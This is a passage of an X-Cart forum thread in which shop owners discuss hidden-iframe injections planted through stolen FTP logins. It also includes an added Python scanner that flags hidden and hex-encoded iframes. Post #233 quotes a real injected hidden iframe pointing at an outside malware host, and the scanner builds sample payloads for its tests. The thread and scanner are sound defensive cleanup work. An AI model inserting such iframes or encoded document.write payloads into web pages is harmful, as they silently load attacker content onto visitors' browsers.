Warning: Iframe based attacks using stolen FTP access info

#231
We haven't had an iFrame incident since this issue back in December. Was everything secured and updated on the server levels? Have you scanned the server and contacted those users that were infected and told them to update their software?
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance

#232
I am somewhat hesitant to say my problem is solved but my hacker hasn't been back in a couple of months. I believe my hacker was gaining access through my shared server. I moved to hands-on and so far so good. Blue+cheap=hacked?
__________________
4.1.11

#233
Sorry to break the "silence" but our site was hacked (iframe) on 05/12/2009!
I have cleaned/replaced the index.php files, home.php files, etc. that have the line of code in them. However, if you go into any page of the site (including admin pages) and click to view the source code, the iframe link still exists: <p /><iframe src="http://brugeni.net/?click=313114" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> I've read through this entire thread, and if anyone has any idea what's causing this, please let me know. Thanks for your help!
__________________
Samz -------------------------------------- Heavily modified X-Cart Gold v4.1.10

#234
That means there is an iframe still in your code somewhere - you need to look through ALL of your files, as there are quite a number that are usually injected. Your host can help with this, as they have tools to scan your entire site quickly.
__________________
Padraic Ryan Ryan Design Studio Professional E-Commerce Development

#235
Thanks for the reply. I have Hands-on doing a scan. We'll see what the results are.
Any thoughts on how to prevent another attack? Thanks
__________________
Samz -------------------------------------- Heavily modified X-Cart Gold v4.1.10

#236
Also clear your browser cache and run cleanup.php - you may be looking at files compiled before you cleaned up.
Hands-on was very responsive when I got hit with this - so it is good you are there. They also helped me to correctly set up ftps, just in case insecure ftp has something to do with this attack.
__________________
X-CART (4.1.9,12/4.2.2-3/4.3.1-2/4.4.1-5)-Gold (CDSEO, Altered-Cart On Sale, BCSE Preorder Backorder, QuickOrder, X-Payments, BCSE DPM Module)

#238
Also, I have seen Iframe attacks be encoded in HEX. So you may not be able to look for "iframe" per se in the templates.
It could be a bunch of Hex equivalent characters. Good luck! Thanks, Carrie
__________________
Custom Development, Custom Coding and Pre-built modules for X-cart since 2002! We support X-cart versions 3.x through 5.x! Home of the famous Authorize.net DPM & CIM Modules, Reward Points Module, Point of Sale module, Speed Booster modules and more! Over 200 X-cart Mods available & Thousands of Customizations Since 2002 - bcsengineering.com Please E-Mail us for questions/support!

#239
In recent days we've been seeing the HEX add too. Instead of a regular iframe injection, there's document.write being used in the script portion and everything in there is encoded.
Makes it a little harder to SEE what's an issue, but the injections still appear to be going at the bottom of files, so they're still easy enough to spot.
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance

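A file scan of the kind posts #234 to #239 describe, as an added example that is not part of the original thread or of X-Cart's own tooling: it flags hidden iframes and also decodes runs of hex escapes so an encoded `document.write` payload is caught. The file extensions, the 8-escape threshold, and the sample strings (with the placeholder host `example.invalid`) are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

SCAN_EXT = {".php", ".tpl", ".html", ".htm", ".js"}  # assumed set of web file types
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*[\"']?[01]\b", re.I)
# A run of 8 or more %XX or \xXX escapes: the "HEX" form mentioned in the thread
HEX_RUN = re.compile(r"(?:(?:%|\\x)[0-9a-f]{2}){8,}", re.I)

def decode_hex_run(run):
    """Turn %XX and backslash-x escapes back into characters."""
    return unquote(run.replace("\\x", "%").replace("\\X", "%"), errors="replace")

def scan_text(text):
    """Return (kind, line_number, snippet) findings for one file's content."""
    findings = []
    for m in IFRAME.finditer(text):
        if HIDDEN.search(m.group(0)):  # 1x1, 0x0 or CSS-hidden frame
            line = text.count("\n", 0, m.start()) + 1
            findings.append(("hidden-iframe", line, m.group(0)[:120]))
    for m in HEX_RUN.finditer(text):
        decoded = decode_hex_run(m.group(0))
        if re.search(r"<\s*iframe|document\.write", decoded, re.I):
            line = text.count("\n", 0, m.start()) + 1
            findings.append(("encoded-iframe", line, decoded[:120]))
    return findings

def scan_tree(root):
    """Scan every web file under root; returns {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples, not taken from any real site
PAYLOAD = b'<iframe src="http://example.invalid/" width=0 height=0></iframe>'
SAMPLE_PLAIN = '<?php echo "ok"; ?>\n<iframe src="http://example.invalid/?click=1" width=1 height=1 style="visibility:hidden"></iframe>\n'
SAMPLE_HEX = "<html>\n<body>shop</body>\n<script>document.write(unescape('" + "".join("%%%02x" % b for b in PAYLOAD) + "'));</script>\n"
SAMPLE_CLEAN = '<iframe src="/video.html" width=640 height=360></iframe>\n'

if __name__ == "__main__":
    import sys
    for file, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for kind, line, snippet in found:
            print(f"{file}:{line}: {kind}: {snippet}")
```

Run it against the store's document root and against the compiled template cache, since, as post #236 notes, compiled files can still carry the injection after the sources are cleaned.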
#240
Are these recent attacks still going through FTP with the correct username and password?
__________________
v4.7.12 v5.4.x (In Dev)

X-Cart forums © 2001-2020